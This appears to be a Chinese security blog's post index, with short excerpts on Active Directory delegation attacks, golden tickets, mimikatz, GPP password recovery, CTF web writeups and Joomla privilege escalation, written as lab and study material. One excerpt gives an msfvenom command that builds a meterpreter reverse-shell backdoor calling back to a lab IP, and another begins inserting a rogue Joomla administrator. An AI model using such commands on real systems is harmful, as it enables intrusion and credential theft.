原创 域滲透——基於資源的約束委派利用
環境 域: test.com 域控:Windows server 2012R2, 主機名: AD, IP: 192.168.1.7 委派的域內主機:系統:win2008R2,主機名:win2008,ip:192.168.1.24
原创 非約束委派+Spooler打印機服務 製作黃金票據
環境 域: test.com 域控:Windows server 2012R2, 主機名: AD, IP: 192.168.1.7 域內主機:系統:windows 2008R2,主機名:WIN2008,ip:192.16
原创 發現域中的委派主機或賬戶
PowerView Powerview有兩個版本 一個在dev分支:https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 一個在ma
原创 滲透測試基礎知識
反彈shell MSF windows: 生成後門 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe >
原创 mimikatz的基本使用
常見命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system:
原创 python中關於pyinstaller的問題一些總結
1、安裝虛擬環境+常用命令 我們都知道,如果直接在複雜的環境使用pyinstaller會使得打包出來的文件十分大 pip install virtualenv pip install virtualenvwrapper-win
原创 2020第五空間 web writeup
hate-php 源碼 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code =
原创 CTF 關於linux 7z解壓的一點trick
示例 假如我們可以任意文件上傳,但是後綴拼接了一個hash256(要求是上傳一個7z壓縮文件,因爲題目對應的功能是解壓後綴爲7z的文件) 1、這個時候我們可以在文件名後面加一個/ 2、此時我們的結構爲filename.zip/ha
原创 PHP 中實體符號 繞過eval Bypass
多的就不介紹了 直接看圖吧
原创 第二屆網鼎杯(第三場:朱雀組)Think Java
首先題目給了一些class文件,這些不需要多說,直接jd-gui反編譯或者使用fernflower反編譯也可以 解題過程 先掃一下目錄 得到swagger-ui.html 發現幾個api接口 sql注入得到密碼 源代碼中明
原创 joomla滲透測試(髒牛提權)
本來是個域滲透,不過環境有問題,就當作web題在做了 解題過程 這是一個joomla cms 我們先掃一下目錄 連接mysql 得到MySQL的賬號和密碼 然後創建新的管理員 INSERT INTO `am2zu_
原创 GPP漏洞利用(轉載)
總結與反思: GPP中管理員給域成員添加的賬號信息存在xml,可以直接破解拿到賬號密碼。 測試環境 windows7 普通域成員 windows2008 域控 首先部署GPP,這裏我部署的策略是給域成員都添加一個test用戶
原创 第二屆網鼎杯web WriteUp
學校戰隊總排名五十幾,web和pwn各拿了一個一血,只能說師傅太強了,不過後來的排名有點起飛,最後半小時,直接從前十名飛出去了~~ filejava 這道題主要考察的是java的xxe漏洞,這個題目總共有兩個功能,上傳和下載功能
原创 域滲透小結
參考連接
原创 python2 中文無法解碼的問題
req = requests.post(url,data=data) req.encoding = 'gbk' print(req.text.encode('gbk').decode(req.apparent_encoding))